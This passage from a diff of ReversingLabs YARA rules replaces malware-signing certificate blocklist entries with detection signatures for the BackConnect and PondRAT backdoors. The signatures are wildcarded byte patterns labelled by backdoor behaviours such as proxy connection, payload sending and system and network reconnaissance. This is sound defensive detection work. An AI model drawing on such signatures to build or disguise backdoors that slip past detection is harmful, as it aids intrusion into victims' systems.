+            ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ??
+            48 89 DF E8 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48
+            89 C6 48 89 D7 48 89 54 24 ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 DF E8 ??
+            ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 4C 8B 35 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89
+            EF 49 8D 76 ?? E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ??
+            ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 DE 48 89 C7 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 89 DF
+            E8 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 2B 84 24 ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 49
+            8D 76 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ??
+            ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 89 DE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89
+            E6 E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 89 DF E8
+            ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 2B 84 24
+        }
+		$remove_backdoor_p2 = {
+            45 31 FF 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ??
+            ?? 48 8D 35 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 8D 94 24
+            ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48
+            89 DF E8 ?? ?? ?? ?? 48 89 EE 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 89
+            E2 48 89 C6 4C 89 EF E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ??
+            48 89 EF E8 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B 84 24
+            ?? ?? ?? ?? 48 29 F8 48 C1 F8 ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 8B 06 85 C0 0F 84
+            ?? ?? ?? ?? 48 8D 5C 24 ?? 31 C0 B9 ?? ?? ?? ?? 45 85 FF 48 89 DF F3 48 AB 0F 85 ??
+            ?? ?? ?? 44 8B 7C 24 ?? 45 85 FF 74 ?? 31 C0 B9 ?? ?? ?? ?? 48 89 DF F3 48 AB 8B 54
+            24 ?? 48 8D 35 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 EF
+            E8 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 85 FF 74 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ??
+            E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Milsean Software Limited" and ( pe.signatures [ i ] . serial == "00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" or pe.signatures [ i ] . serial == "fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" ) and 1599523200 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( $load_embedded_library ) and ( all of ( $decrypt_embedded_library_* ) ) and ( all of ( $remove_backdoor_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0C14B611A44A1Bae0E8C7581651845B6 : INFO FILE
+rule REVERSINGLABS_Win64_Backdoor_Backconnect : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BackConnect backdoor."
 		author = "ReversingLabs"
-		id = "116beeac-49c6-56b0-a1c0-855623f604d9"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "2c65c7ea-8546-5423-a1e7-dc7c12663099"
+		date = "2025-04-11"
+		modified = "2025-04-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5464-L5480"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Win64.Backdoor.BackConnect.yara#L1-L154"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7f6028181e33e4ba8264ee367169e7259e19ff49dcae9a337a4ba78c06b459e6"
+		logic_hash = "7089d5f2dab21755e83ca81ea6cf0f8a55fa261fa2c556759812b16a3d78608a"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "BackConnect"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$network_communication_p1 = {
+            48 89 5C 24 ?? 4C 89 44 24 ?? 48 89 4C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 83
+            EC ?? 45 33 F6 4C 8B EA 45 8B FE 41 8B EE 41 8B FE 48 8B D9 48 8B 05 ?? ?? ?? ?? 44
+            3B B8 ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? ?? 44 39 74 39 ?? 0F 84 ?? ??
+            ?? ?? 48 8B 4C 39 ?? 41 FF C7 48 83 F9 ?? 0F 84 ?? ?? ?? ?? 49 8B D0 FF 15 ?? ?? ??
+            ?? 85 C0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ?? ?? 74 ?? 44 89 74 24 ?? 48 8D 84 24
+            ?? ?? ?? ?? 44 89 B4 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 39 ?? BA ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 41 B0 ?? 48 8B
+            81 ?? ?? ?? ?? 44 88 74 07 ?? 8B C5 48 6B D0 ?? 48 03 91 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 48 8B 4C 39 ?? 49 8B D5 FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 85 C0
+            74 ?? 4C 8B 81 ?? ?? ?? ?? 42 80 7C 07 ?? ?? 75 ?? 8B C5 48 6B D0 ?? 49 03 D0 E8 ??
+            ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 89 ?? ?? ?? ?? 49 8B D5 48 8B 4C 39 ?? FF 15 ??
+            ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B D3 44 8B E0 48 8B 89 ?? ?? ?? ?? 48 8B 4C 39 ??
+            FF 15 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 44 8B F0 48 8B 9E ?? ?? ?? ?? 48 03 DF 83 7B
+            ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 48 2B 43 ?? 48 83 F8
+            ?? 7E ?? 48 83 4B ?? ?? 45 33 F6 44 89 73 ?? 41 B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 45 85
+        }
+		$network_communication_p2 = {
+            F6 74 ?? 48 8B 15 ?? ?? ?? ?? 45 33 C9 48 8B 4B ?? 41 B8 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 45 33 F6 85 C0 74 ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 3D ??
+            ?? ?? ?? 75 ?? 41 8B C6 EB ?? 85 C0 78 ?? 01 43 ?? BA ?? ?? ?? ?? 4C 8B 0D ?? ?? ??
+            ?? 48 8B CE 44 8B 43 ?? 89 44 24 ?? E8 ?? ?? ?? ?? EB ?? 48 8B 4B ?? FF 15 ?? ?? ??
+            ?? 48 83 4B ?? ?? E9 ?? ?? ?? ?? 45 33 F6 45 85 E4 0F 84 ?? ?? ?? ?? 44 8B 43 ?? 45
+            85 C0 0F 84 ?? ?? ?? ?? 48 8B 53 ?? 45 33 C9 48 8B 4B ?? FF 15 ?? ?? ?? ?? 83 F8 ??
+            75 ?? FF 15 ?? ?? ?? ?? 48 8B 4B ?? FF 15 ?? ?? ?? ?? 48 83 4B ?? ?? 41 B8 ?? ?? ??
+            ?? 48 8B D3 44 89 73 ?? 48 8B CE E8 ?? ?? ?? ?? EB ?? 48 8B 4B ?? 29 43 ?? 44 8B 43
+            ?? 01 43 ?? 48 63 D0 48 03 D1 E8 ?? ?? ?? ?? 8A 4B ?? F6 C1 ?? 74 ?? 8B 43 ?? C1 E8
+            ?? 39 43 ?? 77 ?? 44 8B 43 ?? 80 E1 ?? 45 33 C9 88 4B ?? 48 8B CE 44 89 74 24 ?? 41
+            8D 51 ?? E8 ?? ?? ?? ?? F6 43 ?? ?? 74 ?? 44 39 73 ?? 75 ?? 45 33 C0 48 8B D3 48 8B
+            CE E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? FF C5 48 83 C7 ??
+            81 FD ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 33 C0 48 8B 9C 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F
+            41 5E 41 5D 41 5C 5F 5E 5D C3
+        }
+		$get_system_information = {
+            48 89 5C 24 ?? 48 89 74 24 ?? 48 89 7C 24 ?? 55 41 54 41 55 41 56 41 57 48 8B EC 48
+            81 EC ?? ?? ?? ?? 48 8B F9 48 8D 4D ?? FF 15 ?? ?? ?? ?? 4C 8B 75 ?? 48 81 FF ?? ??
+            ?? ?? 76 ?? 48 8D 87 ?? ?? ?? ?? 4C 3B F0 4C 0F 42 F0 48 8B 1D ?? ?? ?? ?? 4C 8D A7
+            ?? ?? ?? ?? 4C 39 65 ?? 4C 0F 46 65 ?? 49 81 EC ?? ?? ?? ?? 33 F6 48 85 DB 74 ?? 49
+            3B DE 72 ?? 49 3B DC 73 ?? 48 39 73 ?? 0F 85 ?? ?? ?? ?? 48 8B 1B EB ?? 4C 8B FF 49
+            3B FE 72 ?? 44 8B 6D ?? 33 D2 49 8B C7 49 F7 F5 4C 2B FA 4D 2B FD 4D 3B FE 72 ?? 41
+            B8 ?? ?? ?? ?? 48 8D 55 ?? 49 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 81 7D ?? ?? ??
+            ?? ?? 74 ?? 4C 8B 7D ?? 4D 3B FD 72 ?? EB ?? 4D 85 FF 74 ?? BA ?? ?? ?? ?? 41 B9 ??
+            ?? ?? ?? 41 B8 ?? ?? ?? ?? 49 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 0F 85 ?? ??
+            ?? ?? 4D 3B FE 73 ?? 48 85 DB 0F 85 ?? ?? ?? ?? 49 3B FC 0F 87 ?? ?? ?? ?? 44 8B 7D
+            ?? 33 D2 48 8B C7 45 8B F7 49 F7 F7 41 8B C7 48 2B C2 48 03 C7 48 8B F8 49 3B C4 0F
+            87 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 0F
+            84 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 74 ?? 33 D2 41 8D 7F ?? 48 03 7D ?? 48 03 7D ??
+            48 8B C7 49 F7 F6 48 2B FA 49 3B FC EB ?? 48 85 FF 74 ?? BA ?? ?? ?? ?? 41 B9 ?? ??
+            ?? ?? 41 B8 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 E9 ?? ?? ?? ??
+            48 8D 4B ?? 89 73 ?? BA ?? ?? ?? ?? 48 89 31 48 8B C1 48 89 4B ?? 48 83 C2 ?? 48 83
+            C1 ?? 48 8B F0 48 81 FA ?? ?? ?? ?? 76 ?? 48 8B 05 ?? ?? ?? ?? 48 89 03 48 89 1D ??
+            ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 48 8B C3 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ?? 49 8B
+            E3 41 5F 41 5E 41 5D 41 5C 5D C3
+        }
+		$get_dns_servers_p1 = {
+            4C 8B DC 49 89 5B ?? 55 56 57 41 56 41 57 48 83 EC ?? 83 64 24 ?? ?? 49 8D 43 ?? 33
+            D2 49 89 43 ?? 49 83 63 ?? ?? 45 33 C9 45 33 C0 8D 7A ?? 8B CF FF 15 ?? ?? ?? ?? 8B
+            44 24 ?? 8D 6F ?? 85 C0 0F 84 ?? ?? ?? ?? 8B C8 8B D5 E8 ?? ?? ?? ?? 48 8B D8 48 85
+            C0 0F 84 ?? ?? ?? ?? 48 8D 44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 33 D2 48 89 5C
+            24 ?? 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0B 8B D5 C1 E1 ?? 03 CD E8
+            ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33 FF 39 3B 76 ?? 8B 4C BB ?? FF 15 ?? ?? ?? ??
+            48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 8B 03 2B C5 3B F8 73 ?? 48 8D 15 ?? ?? ?? ?? 48
+            8B CE FF 15 ?? ?? ?? ?? 03 FD 3B 3B 72 ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D6 48
+            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 8B CB 4C 8B F0
+            E8 ?? ?? ?? ?? EB ?? 48 8B CB E8 ?? ?? ?? ?? 45 33 F6 83 64 24 ?? ?? 48 8D 44 24 ??
+            48 89 44 24 ?? 45 33 C9 48 83 64 24 ?? ?? 45 33 C0 33 D2 33 C9 FF 15 ?? ?? ?? ?? 8B
+            44 24 ?? 85 C0 74 ?? 8D 48 ?? 48 8B D5 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 48 8D
+        }
+		$get_dns_servers_p2 = {
+            44 24 ?? 45 33 C9 48 89 44 24 ?? 45 33 C0 33 D2 48 89 5C 24 ?? 33 C9 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D3 48 8D 0D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8B E8 EB ?? 48 8B CB E8 ?? ?? ?? ?? 33 ED 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8D 53 ?? 8D
+            4F ?? E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 4C 8B C7 48 8D 15 ?? ?? ?? ?? 4D 03 C0
+            48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 ?? ?? ?? ?? 48 8B D3 48 8D 0D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 4C 8B F8 48 85 DB 74 ?? 48 8B CB E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85
+            ED 48 8D 15 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4D 8B C7 48 0F 45 D5 49 8B CE 48 83 64
+            24 ?? ?? 48 8B F0 48 89 44 24 ?? E8 ?? ?? ?? ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 49
+            8B CE 48 8B D8 E8 ?? ?? ?? ?? 48 8B CD E8 ?? ?? ?? ?? 49 8B CF E8 ?? ?? ?? ?? 48 8B
+            CE E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B C3 48 8B 5C 24 ?? 48 83 C4 ?? 41 5F
+            41 5E 5F 5E 5D C3
+        }
+		$get_network_interfaces_p1 = {
+            48 8B C4 48 89 58 ?? 48 89 70 ?? 57 41 56 41 57 48 81 EC ?? ?? ?? ?? B9 ?? ?? ?? ??
+            89 48 ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ??
+            48 8B C8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 8B CE E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 8B D8 BA ?? ?? ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8B
+            C3 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B CE FF
+            15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 8B F6 48 85 F6 0F 84 ?? ?? ?? ?? 4C 8D 3D
+            ?? ?? ?? ?? 48 83 64 24 ?? ?? 48 8D 05 ?? ?? ?? ?? 4D 8D 86 ?? ?? ?? ?? 48 89 44 24
+            ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 45 8B 8E ?? ?? ?? ?? 48 8B
+            F8 41 8B C9 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 E9 ?? 74
+            ?? 83 E9 ?? 74 ?? 83 E9 ?? 74 ?? 83 F9 ?? 74 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ??
+            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D
+            15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15
+            ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? EB ?? 48 8D 15 ??
+            ?? ?? ?? 45 33 C0 48 8B CF E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D 86 ?? ?? ?? ?? 48
+        }
+		$get_network_interfaces_p2 = {
+            8B C8 48 8D 15 ?? ?? ?? ?? 4D 8B CF E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D 86 ?? ??
+            ?? ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 83 64 24 ?? ?? 4D 8D
+            86 ?? ?? ?? ?? 4D 8B CF 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 41 83 BE ?? ??
+            ?? ?? ?? 48 8B C8 74 ?? 48 83 64 24 ?? ?? 4D 8D 8E ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ??
+            4C 89 7C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 45 33 C0 48 8D 15 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 41 83 BE ?? ?? ?? ?? ?? 74 ?? 4D 8D 86 ?? ?? ?? ?? 45 33 C9 48 8D
+            15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4D 8D 86 ?? ?? ?? ?? 41 80 38 ?? 74 ?? 45 33
+            C9 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4D 8B 36 48 8D 15 ?? ?? ?? ?? 45 33
+            C0 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 4D 85 F6 0F 85 ?? ?? ?? ?? EB ?? 48 85 F6 74 ??
+            48 8B CE E8 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF 48 8B D8 E8 ?? ?? ?? ?? 48
+            8B C3 EB ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B E3 41 5F 41
+            5E 5F C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEEDCODE SP Z O O" and pe.signatures [ i ] . serial == "0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" and 1600300801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $network_communication_p* ) ) and ( $get_system_information ) and ( all of ( $get_dns_servers_p* ) ) and ( all of ( $get_network_interfaces_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_690910Dc89D7857C3500Fb74Bed2B08D : INFO FILE
+rule REVERSINGLABS_Linux_Backdoor_Pondrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects PondRAT backdoor."
 		author = "ReversingLabs"
-		id = "7c427b1a-fbe9-5e97-9810-87863c70988d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "4169846b-5333-5dfb-886a-8699ae95fc96"
+		date = "2025-09-22"
+		modified = "2025-09-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5482-L5498"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.PondRAT.yara#L1-L99"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3c5da6238279296854eb95ecaed802f453e80c6bceb71c3fa587df0f7d40cf96"
+		logic_hash = "d3a1e7fa39e35574164ebdb1c4d8b63937cb4ee135734056efc24771151c1091"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "PondRAT"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OLIMP STROI, OOO" and pe.signatures [ i ] . serial == "69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" and 1597276800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Fd41E6Bd7428D3008C8A05F68C9Ac6F2 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "ef59a76a-3b59-55a2-9da5-c3ba844bbe77"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L5500-L5518"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e387664dc9aa746e127b4efb2ef43675f8fb6df66e99d33ef765e8fa306a4f18"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$connect_proxy_p1 = {
+            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 89 C5 4C 8D A4
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C3 C7 00 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? BF ?? ??
+            ?? ?? 89 6B ?? 48 89 E5 89 43 ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 89 C2 BE
+            ?? ?? ?? ?? 48 89 DF 49 89 C5 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89
+            DF 31 DB E8 ?? ?? ?? ?? 48 89 D8 48 89 E7 B9 ?? ?? ?? ?? F3 48 AB 8B 15 ?? ?? ?? ??
+            BE ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ?? ?? 4C
+            89 E7 F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 49 B8 ?? ?? ?? ?? ??
+            ?? ?? ?? 4C 89 84 24 ?? ?? ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 48 89 F7 48 89 A4 24
+            ?? ?? ?? ?? B1 ?? F3 48 AB 48 89 D7 B1 ?? F3 48 AB 48 89 E1 8B 19 48 83 C1 ?? 8D 83
+            ?? ?? ?? ?? F7 D3 21 D8 25 ?? ?? ?? ?? 74 ?? 89 C3 48 BF ?? ?? ?? ?? ?? ?? ?? ?? 48
+            89 B4 24 ?? ?? ?? ?? C1 EB ?? A9 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 0F 44 C3 48 8D
+        }
+		$connect_proxy_p2 = {
+            59 ?? BF ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 48 0F 44
+            CB 00 C0 8B 84 24 ?? ?? ?? ?? 48 83 D9 ?? 48 BB ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? 48 29 E9 48 89 9C 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? 89 8C 24 ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 89 84 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 C6
+            4C 89 E7 48 89 C3 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 4C 89 EF 89 C5 E8 ?? ?? ?? ?? 85 ED 75 ?? BF ?? ?? ?? ?? B9 ?? ?? ??
+            ?? 48 89 DE F3 A6 74 ?? 48 89 DF BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            89 E8 5B 5D 41 5C 41 5D C3 0F 1F 00 48 89 DF E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 89
+            E8 5B 5D 41 5C 41 5D C3
+        }
+		$send_payload = {
+            41 55 B8 ?? ?? ?? ?? 41 54 55 89 F5 53 48 89 FB 48 81 EC ?? ?? ?? ?? 48 85 FF 0F 84
+            ?? ?? ?? ?? BF ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ??
+            ?? ?? 89 EE 48 89 DF 48 89 C2 31 DB 49 89 C4 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
+            6C 24 ?? E8 ?? ?? ?? ?? 48 8D 7C 24 ?? 48 89 D8 B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? BE
+            ?? ?? ?? ?? F3 48 AB C7 07 ?? ?? ?? ?? 48 89 EF E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ??
+            ?? 4C 89 EF F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 49 BB ?? ?? ??
+            ?? ?? ?? ?? ?? 4C 89 9C 24 ?? ?? ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 48 89 F7 48 89
+            AC 24 ?? ?? ?? ?? B1 ?? F3 48 AB 48 89 D7 B1 ?? F3 48 AB 48 89 E9 8B 19 48 83 C1 ??
+            8D 83 ?? ?? ?? ?? F7 D3 21 D8 25 ?? ?? ?? ?? 74 ?? 89 C3 49 BA ?? ?? ?? ?? ?? ?? ??
+            ?? 49 B9 ?? ?? ?? ?? ?? ?? ?? ?? C1 EB ?? A9 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 44 C3 48
